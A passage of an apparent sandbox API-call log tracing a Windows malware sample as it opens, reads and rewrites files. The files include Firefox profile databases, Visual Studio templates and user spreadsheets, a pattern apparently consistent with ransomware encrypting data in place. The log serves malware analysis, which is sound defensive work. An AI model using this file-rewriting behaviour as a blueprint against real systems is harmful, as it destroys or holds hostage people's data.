cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0165.403] ReadFile (in: hFile=0x130, lpBuffer=0x25e9758, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9758*, lpNumberOfBytesRead=0x2b1f2bc*=0x146, lpOverlapped=0x0) returned 1 [0165.405] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.405] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0165.405] CloseHandle (hObject=0x130) returned 1 [0165.406] GetCurrentThreadId () returned 0x86c [0165.406] GetCurrentThreadId () returned 0x86c [0165.406] GetCurrentThreadId () returned 0x86c [0165.406] SetEvent (hEvent=0xc4) returned 1 [0165.406] RtlExitUserThread (Status=0x0) Thread: id = 13 os_tid = 0x87c [0060.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.310] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.310] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10000 [0060.310] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.311] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.311] ReleaseMutex (hMutex=0x168) returned 1 [0060.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cert8.db", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cert8.db", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cert8.db", lpUsedDefaultChar=0x0) returned 8 [0060.311] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf000 [0060.314] ReadFile (in: hFile=0x1b4, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.314] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf000 [0060.315] WriteFile (in: hFile=0x1b4, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.315] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.315] WriteFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.315] CloseHandle (hObject=0x1b4) returned 1 [0060.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.319] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.319] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18000 [0060.319] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.319] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.319] ReleaseMutex (hMutex=0x168) returned 1 [0060.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downloads.sqlite", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downloads.sqlite", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="downloads.sqlite", lpUsedDefaultChar=0x0) returned 16 [0060.320] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17000 [0060.323] ReadFile (in: hFile=0x1b4, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17000 [0060.324] WriteFile (in: hFile=0x1b4, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.324] WriteFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.325] CloseHandle (hObject=0x1b4) returned 1 [0060.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x48cc [0060.328] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.328] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.328] ReleaseMutex (hMutex=0x168) returned 1 [0060.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ffjcext.zip", lpUsedDefaultChar=0x0) returned 11 [0060.328] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.330] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x38cc [0060.330] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.331] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x38cc [0060.331] WriteFile (in: hFile=0x1b4, lpBuffer=0x2664a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.332] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.332] WriteFile (in: hFile=0x1b4, lpBuffer=0x26b0dd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b0dd8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.332] CloseHandle (hObject=0x1b4) returned 1 [0060.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.334] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.334] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x499 [0060.334] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.334] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.334] ReleaseMutex (hMutex=0x168) returned 1 [0060.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataSet.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataSet.zip", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataSet.zip", lpUsedDefaultChar=0x0) returned 11 [0060.334] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0df8, nNumberOfBytesToRead=0x499, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b0df8*, lpNumberOfBytesRead=0x2d5f2bc*=0x499, lpOverlapped=0x0) returned 1 [0060.337] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0060.337] WriteFile (in: hFile=0x1b4, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0xa21, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa21, lpOverlapped=0x0) returned 1 [0060.337] CloseHandle (hObject=0x1b4) returned 1 [0060.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.339] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.339] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3d4 [0060.340] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.340] ReleaseMutex (hMutex=0x168) returned 1 [0060.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SettingsInternal.zip", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0060.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SettingsInternal.zip", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SettingsInternal.zip", lpUsedDefaultChar=0x0) returned 20 [0060.340] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0df8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b0df8*, lpNumberOfBytesRead=0x2d5f2bc*=0x3d4, lpOverlapped=0x0) returned 1 [0060.342] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0060.342] WriteFile (in: hFile=0x1b4, lpBuffer=0x1e90038*, nNumberOfBytesToWrite=0x95c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90038*, lpNumberOfBytesWritten=0x2d5f2d0*=0x95c, lpOverlapped=0x0) returned 1 [0060.342] CloseHandle (hObject=0x1b4) returned 1 [0060.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0060.345] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.345] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4a8 [0060.345] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.345] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.345] ReleaseMutex (hMutex=0x168) returned 1 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dataset.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dataset.zip", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dataset.zip", lpUsedDefaultChar=0x0) returned 11 [0060.346] ReadFile (in: hFile=0x1b4, lpBuffer=0x26b0df8, nNumberOfBytesToRead=0x4a8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b0df8*, lpNumberOfBytesRead=0x2d5f2bc*=0x4a8, lpOverlapped=0x0) returned 1 [0060.348] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0060.348] WriteFile (in: hFile=0x1b4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa30, lpOverlapped=0x0) returned 1 [0060.348] CloseHandle (hObject=0x1b4) returned 1 [0060.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.381] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.381] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x89b [0060.381] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.381] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.381] ReleaseMutex (hMutex=0x168) returned 1 [0060.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResourceInternal.zip", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0060.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResourceInternal.zip", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResourceInternal.zip", lpUsedDefaultChar=0x0) returned 20 [0060.382] ReadFile (in: hFile=0x1b8, lpBuffer=0x1ebf2f8, nNumberOfBytesToRead=0x89b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2f8*, lpNumberOfBytesRead=0x2d5f2bc*=0x89b, lpOverlapped=0x0) returned 1 [0060.389] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0060.389] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec5438*, nNumberOfBytesToWrite=0xe23, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ec5438*, lpNumberOfBytesWritten=0x2d5f2d0*=0xe23, lpOverlapped=0x0) returned 1 [0060.390] CloseHandle (hObject=0x1b8) returned 1 [0060.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g01BV9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g01bv9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.391] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.391] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x78d9 [0060.391] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.391] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.391] ReleaseMutex (hMutex=0x168) returned 1 [0060.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g01BV9.xlsx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g01BV9.xlsx", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g01BV9.xlsx", lpUsedDefaultChar=0x0) returned 11 [0060.391] ReadFile (in: hFile=0x1b8, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.392] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x68d9 [0060.393] ReadFile (in: hFile=0x1b8, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.393] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x68d9 [0060.393] WriteFile (in: hFile=0x1b8, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.393] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0060.393] WriteFile (in: hFile=0x1b8, lpBuffer=0x1ec5438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5438*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.393] CloseHandle (hObject=0x1b8) returned 1 [0060.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XKEQC_0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xkeqc_0.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0060.395] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0060.395] SetFilePointer (in: hFile=0x1b8, lDistanceToMove=0, 